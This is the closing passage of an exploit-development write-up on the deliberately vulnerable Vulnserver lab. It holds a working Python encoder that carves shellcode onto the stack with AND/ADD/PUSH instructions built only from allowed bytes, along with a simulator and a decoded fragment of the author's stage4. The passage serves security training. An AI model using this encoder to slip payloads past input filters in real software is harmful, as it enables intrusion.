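The stage 2, 3 and 4 listings above are all instances of one encoding trick: zero EAX with two ANDs whose masks share no bits, ADD (and where needed SUB) immediates built only from allowed bytes until EAX holds the wanted dword, then PUSH it, working from the last dword of the shellcode to the first so the decoded bytes come out in order on the stack. The Python 3 script below is an added example written for this page; it is not Slink and not the author's final_lter.py. It implements that encoder with a per-byte carry search, a charset check, and a small simulator of the AND/ADD/SUB/PUSH instructions that recovers the decoded bytes, and it runs the simulator over one and/and/add/add/push group copied from the stage4 listing. It assumes the usable bytes are 0x01 through 0x7F (ALLOWED_LO/ALLOWED_HI; set them from your own bad-character test), uses ADDs only (no SUB 0x33333333 step, so it is a simpler variant of the Slink output shown above), and pads the input to a dword boundary with NOPs; SAMPLE is constructed input, not real shellcode.

```python
# Added example: an AND/ADD/PUSH stack-carving encoder for a restricted
# character set, in the style of the stage4 listing on this page.  Written
# for this article; it is not Slink and not the author's own tool.
# Assumption: bytes 0x01-0x7F are usable.  Adjust to your bad-character test.

ALLOWED_LO, ALLOWED_HI = 0x01, 0x7F

# Two AND masks with no bits in common, both made of allowed bytes; these
# are the same masks the page's stage4 uses to zero EAX.
ZERO_EAX = (b"\x25" + (0x554E4D4A).to_bytes(4, "little")    # and eax, 0x554e4d4a
            + b"\x25" + (0x2A313235).to_bytes(4, "little"))  # and eax, 0x2a313235
assert 0x554E4D4A & 0x2A313235 == 0


def split_byte(total, n, lo, hi):
    """Split `total` into n values, each in [lo, hi]; None if impossible."""
    if not n * lo <= total <= n * hi:
        return None
    parts, remaining = [], total
    for k in range(n, 0, -1):
        v = min(hi, remaining - (k - 1) * lo)  # leave room for the remaining k-1 parts
        parts.append(v)
        remaining -= v
    return parts


def encode_dword(target, lo=ALLOWED_LO, hi=ALLOWED_HI, max_ops=3):
    """Return 2 or 3 dwords made only of allowed bytes whose sum is `target`
    mod 2^32.  Works from the low byte upward, tracking the carry exactly as
    the CPU's add does, so the 32-bit result matches."""
    for n in range(2, max_ops + 1):
        ops = [[0] * 4 for _ in range(n)]
        carry, ok = 0, True
        for i in range(4):
            t = (target >> (8 * i)) & 0xFF
            for c in (0, 1):  # carry out of this byte position
                parts = split_byte(t - carry + 256 * c, n, lo, hi)
                if parts is not None:
                    break
            if parts is None:
                ok = False
                break
            for j in range(n):
                ops[j][i] = parts[j]
            carry = c
        if ok:
            return [int.from_bytes(bytes(op), "little") for op in ops]
    return None


def encode_shellcode(shellcode, lo=ALLOWED_LO, hi=ALLOWED_HI):
    """Encode arbitrary bytes as and/and/add.../push groups from the allowed
    set.  Dwords are pushed last-first so the decoded bytes sit in order."""
    padded = shellcode + b"\x90" * (-len(shellcode) % 4)  # pad to a dword boundary
    out = bytearray()
    for i in range(len(padded) - 4, -1, -4):
        target = int.from_bytes(padded[i:i + 4], "little")
        adds = encode_dword(target, lo, hi)
        if adds is None:
            raise ValueError("cannot build 0x%08x from [0x%02x, 0x%02x]" % (target, lo, hi))
        out += ZERO_EAX
        for imm in adds:
            out += b"\x05" + imm.to_bytes(4, "little")  # add eax, imm32
        out += b"\x50"                                  # push eax
    return bytes(out)


def in_charset(data, lo=ALLOWED_LO, hi=ALLOWED_HI):
    """True if every byte of `data` is inside the allowed range."""
    return all(lo <= b <= hi for b in data)


def simulate(encoded):
    """Execute the and/add/sub/push subset of x86 the encoder emits and return
    what the pushes leave on the stack, lowest address first."""
    eax, stack, i = 0, b"", 0
    while i < len(encoded):
        op = encoded[i]
        if op == 0x50:                                   # push eax
            stack = eax.to_bytes(4, "little") + stack
            i += 1
            continue
        imm = int.from_bytes(encoded[i + 1:i + 5], "little")
        if op == 0x25:                                   # and eax, imm32
            eax &= imm
        elif op == 0x05:                                 # add eax, imm32
            eax = (eax + imm) & 0xFFFFFFFF
        elif op == 0x2D:                                 # sub eax, imm32
            eax = (eax - imm) & 0xFFFFFFFF
        else:
            raise ValueError("unexpected opcode 0x%02x at offset %d" % (op, i))
        i += 5
    return stack


# Constructed sample input: bytes the target would reject (>= 0x80 and 0x00).
SAMPLE = bytes(range(0x80, 0x8C)) + b"\x00\xFF\x90"

# One and/and/add/add/push group copied from the stage4 listing above
# (the "add eax, 0x67700176 / add eax, 0x56700165" chunk).
PAGE_FRAGMENT = (b"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A"
                 b"\x05\x76\x01\x70\x67\x05\x65\x01\x70\x56\x50")

if __name__ == "__main__":
    enc = encode_shellcode(SAMPLE)
    print("encoded %d -> %d bytes, charset ok: %s" % (len(SAMPLE), len(enc), in_charset(enc)))
    print("round-trip ok:", simulate(enc) == SAMPLE + b"\x90")
    print("page fragment decodes to:", simulate(PAGE_FRAGMENT).hex())
```

Run it directly to see the size growth and the round-trip check; each 4 bytes of input become at most 26 bytes of encoder (10 for the two ANDs, up to 15 for three ADDs, 1 for the PUSH), which is why an encoded stage is several times larger than the raw msfvenom payload. The simulator only checks the arithmetic: on the target the pushed dwords must land directly after the encoder code, so ESP has to be positioned at the end of the stage before it runs, which is the job of the PUSH ESP / POP EBX / SUB / CALL EBX alignment described above.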

Hope you also learned something from it. Thanks for reading!


[ExpDev] Vulnserver — Part 7 was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
